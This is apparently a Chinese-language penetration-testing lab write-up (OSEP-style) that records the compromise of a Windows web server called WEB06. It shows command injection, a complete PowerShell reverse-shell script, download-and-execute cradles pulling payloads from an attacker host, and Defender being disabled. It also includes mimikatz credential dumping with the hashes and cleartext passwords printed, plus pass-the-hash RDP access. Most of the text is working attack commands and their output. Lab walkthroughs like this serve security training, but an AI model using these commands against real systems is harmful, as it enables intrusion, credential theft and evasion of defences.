注意说明:
The current release version is 0.4.5.1 which is available on port **8080 from both final.com and dev.final.com**
The current insider version is 0.4.7.2 which is available on port **8081 from dev.final.com only**
197设置全局代理之后,可以直接在firefox上访问http://172.16.243.194:8081/
尝试命令注入127.0.0.1 && whoami
再次注入127.0.0.1 && ipconfig
可以确定该机器为Windows系统,接着上传执行PowerShell反弹shell,参考:https://www.revshells.com/
$TCPClient = New-Object Net.Sockets.TCPClient('192.168.49.243', 443);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()
再次注入:127.0.0.1 && powershell -exec bypass IEX((New-Object System.Net.WebClient).DownloadString('[<http://192.168.49.243/rev.ps1>](<http://192.168.49.243/rev.ps1>)'))
得到反弹shell:
┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.49.243] from (UNKNOWN) [192.168.243.189] 62982
SHELL> whoami
dev\\apachesvc
SHELL> hostname
web06
SHELL> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
DEV\\Domain Admins
DEV\\SQLAdmin
DEV\\WebAdmin
setup
The command completed successfully.
SHELL> net user dev\\apachesvc
SHELL> net user apachesvc
SHELL> cd c:\\Users\\Administrator\\Desktop
SHELL> dir
Directory: C:\\Users\\Administrator\\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/2/2020 12:46 PM 32 proof.txt
SHELL> more proof.txt
150a6e6452dbe96b8262243842b23911
SHELL> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.243.194
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.243.254
SHELL> Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose
SHELL> IWR <http://192.168.49.243:443/revshell.exe> -OutFile revshell.exe
SHELL> dir
Directory: C:\\Users\\Administrator\\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/2/2020 12:46 PM 32 proof.txt
-a---- 8/4/2022 12:47 AM 5632 revshell.exe
SHELL> revshell.exe
Invoke-Expression : The term 'revshell.exe' is not recognized as the name of a cmdlet, function, script file, or
operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
again.
At line:1 char:513
+ ... BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-S ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (revshell.exe:String) [Invoke-Expression], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException,Microsoft.PowerShell.Commands.InvokeExpressionCommand
SHELL> .\\revshell.exe
┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ nc -lvnp 80 1 ⨯
listening on [any] 80 ...
connect to [192.168.49.243] from (UNKNOWN) [192.168.243.189] 63586
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\\Users\\Administrator\\Desktop>
C:\\Users\\Administrator\\Desktop>certutil.exe -urlcache -f <http://192.168.49.243/mimikatz.exe> mimikatz.exe
certutil.exe -urlcache -f <http://192.168.49.243/mimikatz.exe> mimikatz.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
C:\\Users\\Administrator\\Desktop>**mimikatz.exe "sekurlsa::logonPasswords" "exit"**
mimikatz.exe "sekurlsa::logonPasswords" "exit"
.#####. mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <http://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <http://pingcastle.com> / <http://mysmartlogon.com> ***/
mimikatz(commandline) # sekurlsa::logonPasswords
Authentication Id : 0 ; 573794 (00000000:0008c162)
Session : Service from 0
User Name : sqlsvc01
Domain : DEV
Logon Server : DC02
Logon Time : 8/4/2022 12:00:38 AM
SID : S-1-5-21-3097757723-3922880870-3169422460-1108
msv :
[00000003] Primary
* Username : sqlsvc01
* Domain : DEV
* NTLM : 077a55c458dc4002dfdc5321a7659526
* SHA1 : 8094dd9dcd751be1081dded062d5e0153daf8836
* DPAPI : b713b3e0fc6eb8e37cadd2d5eda8daea
tspkg :
wdigest :
* Username : sqlsvc01
* Domain : DEV
* Password : (null)
kerberos :
* Username : sqlsvc01
* Domain : DEV.FINAL.COM
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 399206 (00000000:00061766)
Session : Interactive from 0
User Name : setup
Domain : WEB06
Logon Server : WEB06
Logon Time : 8/3/2022 11:59:36 PM
SID : S-1-5-21-3244638768-2436265245-2643559287-1001
msv :
[00000003] Primary
* Username : setup
* Domain : WEB06
* NTLM : 42efdb0f0c884f32d51c2d785ea2d174
* SHA1 : f76679836170e221fe696e1deec2b5aa83e18d38
tspkg :
wdigest :
* Username : setup
* Domain : WEB06
* Password : (null)
kerberos :
* Username : setup
* Domain : WEB06
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 311258 (00000000:0004bfda)
Session : Interactive from 0
User Name : setup
Domain : WEB06
Logon Server : WEB06
Logon Time : 6/19/2022 5:25:46 PM
SID : S-1-5-21-3244638768-2436265245-2643559287-1001
msv :
[00000003] Primary
* Username : setup
* Domain : WEB06
* NTLM : 42efdb0f0c884f32d51c2d785ea2d174
* SHA1 : f76679836170e221fe696e1deec2b5aa83e18d38
tspkg :
wdigest :
* Username : setup
* Domain : WEB06
* Password : (null)
kerberos :
* Username : setup
* Domain : WEB06
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 123703 (00000000:0001e337)
Session : Service from 0
User Name : SQLTELEMETRY$SQLEXPRESS
Domain : NT Service
Logon Server : (null)
Logon Time : 6/19/2022 5:23:29 PM
SID : S-1-5-80-1985561900-798682989-2213159822-1904180398-3434236965
msv :
[00000003] Primary
* Username : WEB06$
* Domain : DEV
* NTLM : ab68c48d38eff8cf6bd67988e90e1b2b
* SHA1 : 82f00ce1116c7570a9546f6aa5357c33124a2a02
tspkg :
wdigest :
* Username : WEB06$
* Domain : DEV
* Password : (null)
kerberos :
* Username : WEB06$
* Domain : dev.final.com
* Password : f0 05 2a 5a f8 d8 c9 9b c4 5b 73 54 a4 25 7d c4 52 ab 8b af 6c 2f 3a f6 82 4e 57 2e 86 7c 22 3d f6 b8 87 16 c5 87 2e 94 a6 64 00 6a 3b 57 b8 f2 2b 9d 3b d0 be 2c 34 8e 2a 14 f0 43 d8 64 84 f7 0f 69 cd 61 62 f3 67 f2 e3 13 88 fe 42 af ad e8 b1 5d f5 00 31 86 9f 5a 7d 35 b3 67 4f 81 48 44 06 0c 1a e8 d5 56 35 a7 cb 38 a5 41 27 bb 5b 6c 15 aa 1d bb b3 e8 77 13 e6 68 b9 da 22 c1 3a bc 7a 83 23 73 94 a5 db 08 70 c5 a1 b5 d6 ce 9d ec ff c0 fd 46 4a b9 51 34 81 c7 46 e7 dc 9a 36 e2 8d df b7 60 d5 71 42 a9 53 55 c2 ec d5 ce 66 0c 9a 91 05 d1 43 58 be 4f 2e bd 9e ef 97 a8 fe ef eb a6 b2 c1 6e 49 c9 60 9c e1 a2 28 7c 50 81 a6 98 4b f3 56 1f d7 26 db c2 8a 6c a6 3f a1 0d ae 2a 21 52 8a 63 ef 7b 46 40 73 5a 4b 12 8d ca d7
ssp :
credman :
Authentication Id : 0 ; 70621 (00000000:000113dd)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 6/19/2022 5:23:27 PM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WEB06$
* Domain : DEV
* NTLM : ab68c48d38eff8cf6bd67988e90e1b2b
* SHA1 : 82f00ce1116c7570a9546f6aa5357c33124a2a02
tspkg :
wdigest :
* Username : WEB06$
* Domain : DEV
* Password : (null)
kerberos :
* Username : WEB06$
* Domain : dev.final.com
* Password : f0 05 2a 5a f8 d8 c9 9b c4 5b 73 54 a4 25 7d c4 52 ab 8b af 6c 2f 3a f6 82 4e 57 2e 86 7c 22 3d f6 b8 87 16 c5 87 2e 94 a6 64 00 6a 3b 57 b8 f2 2b 9d 3b d0 be 2c 34 8e 2a 14 f0 43 d8 64 84 f7 0f 69 cd 61 62 f3 67 f2 e3 13 88 fe 42 af ad e8 b1 5d f5 00 31 86 9f 5a 7d 35 b3 67 4f 81 48 44 06 0c 1a e8 d5 56 35 a7 cb 38 a5 41 27 bb 5b 6c 15 aa 1d bb b3 e8 77 13 e6 68 b9 da 22 c1 3a bc 7a 83 23 73 94 a5 db 08 70 c5 a1 b5 d6 ce 9d ec ff c0 fd 46 4a b9 51 34 81 c7 46 e7 dc 9a 36 e2 8d df b7 60 d5 71 42 a9 53 55 c2 ec d5 ce 66 0c 9a 91 05 d1 43 58 be 4f 2e bd 9e ef 97 a8 fe ef eb a6 b2 c1 6e 49 c9 60 9c e1 a2 28 7c 50 81 a6 98 4b f3 56 1f d7 26 db c2 8a 6c a6 3f a1 0d ae 2a 21 52 8a 63 ef 7b 46 40 73 5a 4b 12 8d ca d7
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WEB06$
Domain : DEV
Logon Server : (null)
Logon Time : 6/19/2022 5:23:26 PM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : WEB06$
* Domain : DEV
* NTLM : ab68c48d38eff8cf6bd67988e90e1b2b
* SHA1 : 82f00ce1116c7570a9546f6aa5357c33124a2a02
tspkg :
wdigest :
* Username : WEB06$
* Domain : DEV
* Password : (null)
kerberos :
* Username : web06$
* Domain : DEV.FINAL.COM
* Password : f0 05 2a 5a f8 d8 c9 9b c4 5b 73 54 a4 25 7d c4 52 ab 8b af 6c 2f 3a f6 82 4e 57 2e 86 7c 22 3d f6 b8 87 16 c5 87 2e 94 a6 64 00 6a 3b 57 b8 f2 2b 9d 3b d0 be 2c 34 8e 2a 14 f0 43 d8 64 84 f7 0f 69 cd 61 62 f3 67 f2 e3 13 88 fe 42 af ad e8 b1 5d f5 00 31 86 9f 5a 7d 35 b3 67 4f 81 48 44 06 0c 1a e8 d5 56 35 a7 cb 38 a5 41 27 bb 5b 6c 15 aa 1d bb b3 e8 77 13 e6 68 b9 da 22 c1 3a bc 7a 83 23 73 94 a5 db 08 70 c5 a1 b5 d6 ce 9d ec ff c0 fd 46 4a b9 51 34 81 c7 46 e7 dc 9a 36 e2 8d df b7 60 d5 71 42 a9 53 55 c2 ec d5 ce 66 0c 9a 91 05 d1 43 58 be 4f 2e bd 9e ef 97 a8 fe ef eb a6 b2 c1 6e 49 c9 60 9c e1 a2 28 7c 50 81 a6 98 4b f3 56 1f d7 26 db c2 8a 6c a6 3f a1 0d ae 2a 21 52 8a 63 ef 7b 46 40 73 5a 4b 12 8d ca d7
ssp :
credman :
Authentication Id : 0 ; 40997 (00000000:0000a025)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 6/19/2022 5:23:26 PM
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : WEB06$
* Domain : DEV
* NTLM : ab68c48d38eff8cf6bd67988e90e1b2b
* SHA1 : 82f00ce1116c7570a9546f6aa5357c33124a2a02
tspkg :
wdigest :
* Username : WEB06$
* Domain : DEV
* Password : (null)
kerberos :
* Username : WEB06$
* Domain : dev.final.com
* Password : f0 05 2a 5a f8 d8 c9 9b c4 5b 73 54 a4 25 7d c4 52 ab 8b af 6c 2f 3a f6 82 4e 57 2e 86 7c 22 3d f6 b8 87 16 c5 87 2e 94 a6 64 00 6a 3b 57 b8 f2 2b 9d 3b d0 be 2c 34 8e 2a 14 f0 43 d8 64 84 f7 0f 69 cd 61 62 f3 67 f2 e3 13 88 fe 42 af ad e8 b1 5d f5 00 31 86 9f 5a 7d 35 b3 67 4f 81 48 44 06 0c 1a e8 d5 56 35 a7 cb 38 a5 41 27 bb 5b 6c 15 aa 1d bb b3 e8 77 13 e6 68 b9 da 22 c1 3a bc 7a 83 23 73 94 a5 db 08 70 c5 a1 b5 d6 ce 9d ec ff c0 fd 46 4a b9 51 34 81 c7 46 e7 dc 9a 36 e2 8d df b7 60 d5 71 42 a9 53 55 c2 ec d5 ce 66 0c 9a 91 05 d1 43 58 be 4f 2e bd 9e ef 97 a8 fe ef eb a6 b2 c1 6e 49 c9 60 9c e1 a2 28 7c 50 81 a6 98 4b f3 56 1f d7 26 db c2 8a 6c a6 3f a1 0d ae 2a 21 52 8a 63 ef 7b 46 40 73 5a 4b 12 8d ca d7
ssp :
credman :
Authentication Id : 0 ; 39704 (00000000:00009b18)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 6/19/2022 5:23:26 PM
SID :
msv :
[00000003] Primary
* Username : WEB06$
* Domain : DEV
* NTLM : ab68c48d38eff8cf6bd67988e90e1b2b
* SHA1 : 82f00ce1116c7570a9546f6aa5357c33124a2a02
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 534240 (00000000:000826e0)
Session : Service from 0
User Name : apacheSvc
Domain : DEV
Logon Server : DC02
Logon Time : 8/4/2022 12:00:36 AM
SID : S-1-5-21-3097757723-3922880870-3169422460-1109
msv :
[00000003] Primary
* Username : apacheSvc
* Domain : DEV
* NTLM : a6a5f008019060ab8079feca697f9f73
* SHA1 : e957ac189a18afeaa3719d633bb817c14d132336
* DPAPI : 9ac5d1d435e5c7fd520505b52faa487b
tspkg :
wdigest :
* Username : apacheSvc
* Domain : DEV
* Password : (null)
kerberos :
* Username : apacheSvc
* Domain : DEV.FINAL.COM
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 6/19/2022 5:23:27 PM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 41098 (00000000:0000a08a)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 6/19/2022 5:23:26 PM
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : WEB06$
* Domain : DEV
* NTLM : ab68c48d38eff8cf6bd67988e90e1b2b
* SHA1 : 82f00ce1116c7570a9546f6aa5357c33124a2a02
tspkg :
wdigest :
* Username : WEB06$
* Domain : DEV
* Password : (null)
kerberos :
* Username : WEB06$
* Domain : dev.final.com
* Password : f0 05 2a 5a f8 d8 c9 9b c4 5b 73 54 a4 25 7d c4 52 ab 8b af 6c 2f 3a f6 82 4e 57 2e 86 7c 22 3d f6 b8 87 16 c5 87 2e 94 a6 64 00 6a 3b 57 b8 f2 2b 9d 3b d0 be 2c 34 8e 2a 14 f0 43 d8 64 84 f7 0f 69 cd 61 62 f3 67 f2 e3 13 88 fe 42 af ad e8 b1 5d f5 00 31 86 9f 5a 7d 35 b3 67 4f 81 48 44 06 0c 1a e8 d5 56 35 a7 cb 38 a5 41 27 bb 5b 6c 15 aa 1d bb b3 e8 77 13 e6 68 b9 da 22 c1 3a bc 7a 83 23 73 94 a5 db 08 70 c5 a1 b5 d6 ce 9d ec ff c0 fd 46 4a b9 51 34 81 c7 46 e7 dc 9a 36 e2 8d df b7 60 d5 71 42 a9 53 55 c2 ec d5 ce 66 0c 9a 91 05 d1 43 58 be 4f 2e bd 9e ef 97 a8 fe ef eb a6 b2 c1 6e 49 c9 60 9c e1 a2 28 7c 50 81 a6 98 4b f3 56 1f d7 26 db c2 8a 6c a6 3f a1 0d ae 2a 21 52 8a 63 ef 7b 46 40 73 5a 4b 12 8d ca d7
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WEB06$
Domain : DEV
Logon Server : (null)
Logon Time : 6/19/2022 5:23:26 PM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WEB06$
* Domain : DEV
* Password : (null)
kerberos :
* Username : web06$
* Domain : DEV.FINAL.COM
* Password : f0 05 2a 5a f8 d8 c9 9b c4 5b 73 54 a4 25 7d c4 52 ab 8b af 6c 2f 3a f6 82 4e 57 2e 86 7c 22 3d f6 b8 87 16 c5 87 2e 94 a6 64 00 6a 3b 57 b8 f2 2b 9d 3b d0 be 2c 34 8e 2a 14 f0 43 d8 64 84 f7 0f 69 cd 61 62 f3 67 f2 e3 13 88 fe 42 af ad e8 b1 5d f5 00 31 86 9f 5a 7d 35 b3 67 4f 81 48 44 06 0c 1a e8 d5 56 35 a7 cb 38 a5 41 27 bb 5b 6c 15 aa 1d bb b3 e8 77 13 e6 68 b9 da 22 c1 3a bc 7a 83 23 73 94 a5 db 08 70 c5 a1 b5 d6 ce 9d ec ff c0 fd 46 4a b9 51 34 81 c7 46 e7 dc 9a 36 e2 8d df b7 60 d5 71 42 a9 53 55 c2 ec d5 ce 66 0c 9a 91 05 d1 43 58 be 4f 2e bd 9e ef 97 a8 fe ef eb a6 b2 c1 6e 49 c9 60 9c e1 a2 28 7c 50 81 a6 98 4b f3 56 1f d7 26 db c2 8a 6c a6 3f a1 0d ae 2a 21 52 8a 63 ef 7b 46 40 73 5a 4b 12 8d ca d7
ssp :
credman :
mimikatz(commandline) # exit
Bye!
**C:\\Users\\Administrator\\Desktop>mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"**
mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"
.#####. mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <http://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <http://pingcastle.com> / <http://mysmartlogon.com> ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\\SYSTEM
500 {0;000003e7} 1 D 35014 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000826e0} 0 D 2101924 DEV\\apacheSvc S-1-5-21-3097757723-3922880870-3169422460-1109 (13g,24p) Primary
* Thread Token : {0;000003e7} 1 D 2129276 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # lsadump::secrets
Domain : WEB06
SysKey : 485476db53e09f6acf163790d111434a
Local name : WEB06 ( S-1-5-21-3244638768-2436265245-2643559287 )
Domain name : DEV ( S-1-5-21-3097757723-3922880870-3169422460 )
Domain FQDN : dev.final.com
Policy subsystem is : 1.18
LSA Key(s) : 1, default {67749853-7ea1-c0c4-fcb6-c0d8ba6d233f}
[00] {67749853-7ea1-c0c4-fcb6-c0d8ba6d233f} 769820fc025df5105f42b88eb83c726ec0f464d76c12030025ee76dcc99edef2
Secret : $MACHINE.ACC
cur/hex : f0 05 2a 5a f8 d8 c9 9b c4 5b 73 54 a4 25 7d c4 52 ab 8b af 6c 2f 3a f6 82 4e 57 2e 86 7c 22 3d f6 b8 87 16 c5 87 2e 94 a6 64 00 6a 3b 57 b8 f2 2b 9d 3b d0 be 2c 34 8e 2a 14 f0 43 d8 64 84 f7 0f 69 cd 61 62 f3 67 f2 e3 13 88 fe 42 af ad e8 b1 5d f5 00 31 86 9f 5a 7d 35 b3 67 4f 81 48 44 06 0c 1a e8 d5 56 35 a7 cb 38 a5 41 27 bb 5b 6c 15 aa 1d bb b3 e8 77 13 e6 68 b9 da 22 c1 3a bc 7a 83 23 73 94 a5 db 08 70 c5 a1 b5 d6 ce 9d ec ff c0 fd 46 4a b9 51 34 81 c7 46 e7 dc 9a 36 e2 8d df b7 60 d5 71 42 a9 53 55 c2 ec d5 ce 66 0c 9a 91 05 d1 43 58 be 4f 2e bd 9e ef 97 a8 fe ef eb a6 b2 c1 6e 49 c9 60 9c e1 a2 28 7c 50 81 a6 98 4b f3 56 1f d7 26 db c2 8a 6c a6 3f a1 0d ae 2a 21 52 8a 63 ef 7b 46 40 73 5a 4b 12 8d ca d7
NTLM:ab68c48d38eff8cf6bd67988e90e1b2b
SHA1:82f00ce1116c7570a9546f6aa5357c33124a2a02
old/hex : 78 03 14 f5 42 56 39 00 18 dc 9e d5 1a 24 9c 8d 8d 99 29 ab 50 31 0a f2 49 08 68 98 e1 ae a0 bb 5e 6f 96 ef a8 63 26 45 db a8 77 4c 96 00 39 9f 80 18 09 70 72 53 5a e8 53 71 34 56 52 32 fc ac ea ef 64 c5 2d 80 d5 7d 75 b4 ea 3b 7e bd f4 ae 62 c1 ce 0c 68 36 8d e4 23 60 0b 50 fe d1 6c 75 19 23 7a 3d c9 7d b6 af cd 57 d3 50 7a c6 46 cf b8 5d 42 6a a4 87 e1 8b 53 22 11 7e 7a d1 19 29 31 d3 44 8e 7a 76 a2 0e 4c ad df ca 87 44 b8 e7 cf c3 c0 fe 5b 68 99 58 3f 68 6c 3a 93 79 49 1e 49 97 84 a2 d1 a6 63 f2 e0 50 74 09 44 f5 13 a1 7f ab c3 26 d0 d2 cf 97 9b 20 6a b7 bd e1 b2 88 1c c9 15 f6 b0 ab 95 c2 ab 14 f6 8e bc 87 fe c4 38 f8 f3 2c a6 32 9b 70 81 4b e1 ac b3 0c ad 14 3a f1 df 8a cc c9 35 2a b9 bf bc e5 96 f1 a7 0c
NTLM:21fee78e369bc6ade5f55592dd444270
SHA1:73ad2b1adb583dcb4539102c2e0a3bca0bd28ea1
Secret : DefaultPassword
Secret : DPAPI_SYSTEM
cur/hex : 01 00 00 00 61 c8 fa 44 cf c2 83 d3 1c 75 86 59 57 c4 38 51 c2 36 30 70 79 15 55 80 8e a4 d3 b2 4d 81 98 6e d7 2a 2d 2b 09 5b 25 d3
full: 61c8fa44cfc283d31c75865957c43851c2363070791555808ea4d3b24d81986ed72a2d2b095b25d3
m/u : 61c8fa44cfc283d31c75865957c43851c2363070 / 791555808ea4d3b24d81986ed72a2d2b095b25d3
old/hex : 01 00 00 00 5e db 85 7e 78 5f 10 47 49 eb 19 93 31 48 36 b4 bc df 62 7d 33 59 f6 e1 27 79 91 f3 14 63 10 52 e7 9f 07 c6 ee 7d 6e 9f
full: 5edb857e785f104749eb1993314836b4bcdf627d3359f6e1277991f314631052e79f07c6ee7d6e9f
m/u : 5edb857e785f104749eb1993314836b4bcdf627d / 3359f6e1277991f314631052e79f07c6ee7d6e9f
Secret : NL$KM
cur/hex : a8 f9 a5 0c 77 0d 3e f3 43 1d 4c 0b cf fd ac 3b a3 fa 6c 53 28 23 3e 21 9d 44 c3 ee 85 fc fc cc 70 fb 59 ec 7e 60 c4 10 b6 93 a0 34 51 54 1f 35 76 ab 4f 88 70 de fa 24 30 89 dd ab 11 aa 94 98
old/hex : a8 f9 a5 0c 77 0d 3e f3 43 1d 4c 0b cf fd ac 3b a3 fa 6c 53 28 23 3e 21 9d 44 c3 ee 85 fc fc cc 70 fb 59 ec 7e 60 c4 10 b6 93 a0 34 51 54 1f 35 76 ab 4f 88 70 de fa 24 30 89 dd ab 11 aa 94 98
**Secret : _SC_Apache2.4 / service 'Apache2.4' with username : [email protected]
cur/text: fgodSDOJFSdjk53df
Secret : _SC_MSSQL$SQLEXPRESS / service 'MSSQL$SQLEXPRESS' with username : [email protected]
cur/text: FDksld894rkjlsdfg**
Secret : _SC_SQLTELEMETRY$SQLEXPRESS / service 'SQLTELEMETRY$SQLEXPRESS' with username : NT Service\\SQLTELEMETRY$SQLEXPRESS
mimikatz(commandline) # exit
Bye!
C:\\Users\\Administrator\\Desktop>**mimikatz.exe "privilege::debug" "token::elevate" "lsadump::lsa /patch" "exit"**
mimikatz.exe "privilege::debug" "token::elevate" "lsadump::lsa /patch" "exit"
.#####. mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <http://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <http://pingcastle.com> / <http://mysmartlogon.com> ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\\SYSTEM
500 {0;000003e7} 1 D 35014 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000826e0} 0 D 2131516 DEV\\apacheSvc S-1-5-21-3097757723-3922880870-3169422460-1109 (13g,24p) Primary
* Thread Token : {0;000003e7} 1 D 2158780 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # lsadump::lsa /patch
Domain : WEB06 / S-1-5-21-3244638768-2436265245-2643559287
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : **f99529e42ee77dc4704c568ba9320a34**
RID : 000001f7 (503)
User : DefaultAccount
LM :
NTLM :
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000003e9 (1001)
User : setup
LM :
NTLM : 42efdb0f0c884f32d51c2d785ea2d174
RID : 000001f8 (504)
User : WDAGUtilityAccount
LM :
NTLM : 1e47acda1887221f618e196e33f3e14d
mimikatz(commandline) # exit
Bye!
**C:\\Users\\Administrator\\Desktop>certutil.exe -urlcache -f <http://192.168.49.243/PowerUpSQL.ps1> PowerUpSQL.ps1**
certutil.exe -urlcache -f <http://192.168.49.243/PowerUpSQL.ps1> PowerUpSQL.ps1
**** Online ****
CertUtil: -URLCache command completed successfully.
C:\\Users\\Administrator\\Desktop>powershell -exec bypass
powershell -exec bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\\Users\\Administrator\\Desktop> **Import-Module .\\PowerUpSQL.ps1**
Import-Module .\\PowerUpSQL.ps1
PS C:\\Users\\Administrator\\Desktop> **Get-SQLInstanceLocal -Verbose**
Get-SQLInstanceLocal -Verbose
ComputerName : WEB06
Instance : WEB06\\SQLEXPRESS
ServiceDisplayName : SQL Server (SQLEXPRESS)
ServiceName : MSSQL$SQLEXPRESS
ServicePath : "C:\\Program Files\\Microsoft SQL Server\\MSSQL15.SQLEXPRESS\\MSSQL\\Binn\\sqlservr.exe" -sSQLEXPRESS
ServiceAccount : [email protected]
State : Running
PS C:\\Users\\Administrator\\Desktop> **Get-SQLInstanceDomain -Verbose**
Get-SQLInstanceDomain -Verbose
VERBOSE: Grabbing SPNs from the domain for SQL Servers (MSSQL*)...
VERBOSE: Parsing SQL Server instances from SPNs...
VERBOSE: 1 instances were found.
ComputerName : web06.dev.final.com
Instance : web06.dev.final.com,1433
DomainAccountSid : 150000052100027816418410210521023312414023318884400
DomainAccount : sqlsvc01
DomainAccountCn : sqlsvc01
Service : MSSQLSvc
Spn : MSSQLSvc/web06.dev.final.com:1433
LastLogon : 8/4/2022 12:00 AM
Description :
PS C:\\Users\\Administrator\\Desktop> **Get-SQLServerInfo -Verbose -Instance WEB06**
Get-SQLServerInfo -Verbose -Instance WEB06
VERBOSE: WEB06 : Connection Success.
ComputerName : WEB06
Instance : WEB06\\SQLEXPRESS
DomainName : DEV
ServiceProcessID : 4392
ServiceName : MSSQL$SQLEXPRESS
ServiceAccount : [email protected]
AuthenticationMode : Windows and SQL Server Authentication
ForcedEncryption : 0
Clustered : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion : 2019
SQLServerEdition : Express Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsVersionNumber : SQL
Currentlogin : DEV\\apacheSvc
IsSysadmin : No
ActiveSessions : 1
允许RDP 传输HASH
PS C:\\Users\\Administrator\\Desktop> **New-ItemProperty -Path "HKLM:\\System\\CurrentControlSet\\Control\\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force**
New-ItemProperty -Path "HKLM:\\System\\CurrentControlSet\\Control\\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force
DisableRestrictedAdmin : 0
PSPath : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa
PSParentPath : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control
PSChildName : Lsa
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\\Registry
3389连接:proxychains4 xfreerdp /v:172.16.243.194 /u:administrator /pth:f99529e42ee77dc4704c568ba9320a34 +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore